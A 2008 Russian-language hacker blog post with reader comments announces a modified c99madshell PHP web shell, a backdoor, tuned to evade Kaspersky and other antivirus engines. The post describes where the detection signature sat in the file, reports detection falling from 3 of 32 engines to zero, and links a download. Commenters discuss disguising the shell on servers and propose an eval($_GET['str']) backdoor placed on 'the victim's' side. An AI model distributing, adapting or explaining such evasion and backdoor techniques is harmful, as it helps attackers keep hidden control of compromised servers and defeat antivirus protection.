жизньтворчество РусскийEnglish

с99madshell обход Kaspersky

с99madshell обход Kaspersky
17, мая, 2008
   Некоторое время назад Kaspersky и кое какие другие антивирусы, обменивающиеся сигнатурами, начали определять шелл, как нехорошее приложение, в принципе ничего плохого из-за этого не случилось, т.к. мало где эти антивирусы являются серверными, но все равно неприятно, поэтому выкладываю модифицированную версию. Поиск сигнатуры определения скрипта доставил много удовольствий, сигнатура оказалась банальнейшей, это 2 байта по смещению 10 байт с конца файла, поэтому убрать шелл из базы заняло 5 секунд.

Результаты тестирования предыдущей версии:
Результат: 3/32 (9.38%)
F-Secure 6.70.13260.0 2008.05.17 Backdoor.PHP.Rst.ak
GData 2.0.7306.1023 2008.05.17 Backdoor.PHP.Rst.ak
Kaspersky 7.0.0.125 2008.05.17 Backdoor.PHP.Rst.ak

Результаты тестирования текущей версии:
Результат: 0/32 (0%)

Скачать шелл можно по старому адресу
http://madnet.name/files/1/10.html

  

 комментарии:
x-demon
У тебя РСС криво пашет. Выбросило на /news/49 а надо то на /news/49.html
З.Ы. и выложи сорец шелла. А то я его под cpanel маскирую, а распаковывать твою защиту задаче та еще.

~~~~~~~~~~~~~
gzip там
он же пишет))

~~~~~~~~~~~~~
Nek1t
Что теперь не палицца AV - хорошо, но ты убрал $login и $pass в gzip :( Верни обратно...

~~~~~~~~~~~~~
madnet

Nek1t, на месте.

~~~~~~~~~~~~~
dr.Teo
зря на вирустотал залил, скоро опять запалят его

~~~~~~~~~~~~~
madnet

dr.Teo, запарятся )

~~~~~~~~~~~~~
Nek1t
madnet, спс. Слушай, а может вернешь в шелл декодер? Ну в оригинальном c99 был перекодировщик который из/в base64 перегонял, md5 считал... Удобно было очень.

~~~~~~~~~~~~~
anty
Спсаибо.

~~~~~~~~~~~~~
asshole
Ok.

~~~~~~~~~~~~~
a6y
Есть идея резделить твой шелл на клиент - сервер. Сейчас как раз этим занимаюсь =) Суть простая - все команды перевести в "стринги" и слать на скрипт с eval($_GET['str']); на стороне жертвы. Получица тот же самый шелл,но спрятать его будет в разы легче... Единственная проблема - дамп базы =(( Никак не получается его реализовать =(( Может подкинешь идею?! =)

~~~~~~~~~~~~~
Tellur
Касперский устроил мне панику на весь ноут)
http://www.securelist.com/ru/search?VN=Backdoor.PH P.C99Shell.bf

С этим надо что-то делать)

~~~~~~~~~~~~~

 Комментировать:
Имя:
Текст:

ПОПУЛЯРНЫЕ ТЕМЫ

c99madshell
madSS | Сканнер структуры сайт...
Я люблю журнал Хакер?!
madSpamer script
Hack Search – поисковик для ха...
фленов пишет чушь
Мэйлру ебнулось!?
Открытие…
Спасем Windows XP!
xss сниффер

ПОИСК УЯЗВИМОСТЕЙhelp

HACK SEARCHhelp

ПРОЕКТЫ

GmadS - Онлайн веб сканнер
c99madshell - веб шелл
P2GmadGEN - Онлайн генератор запросов
FREE SOCKS5 - бесплатные прокси
Mssql decoder - Расшифровка паролей mssql

ДРУЗЬЯ

RSS feed   RSS comments feed
| жизнь | творчество | © Powered and Designed by madnet. 2006-2011 year. © ICQ: 751777 madnet online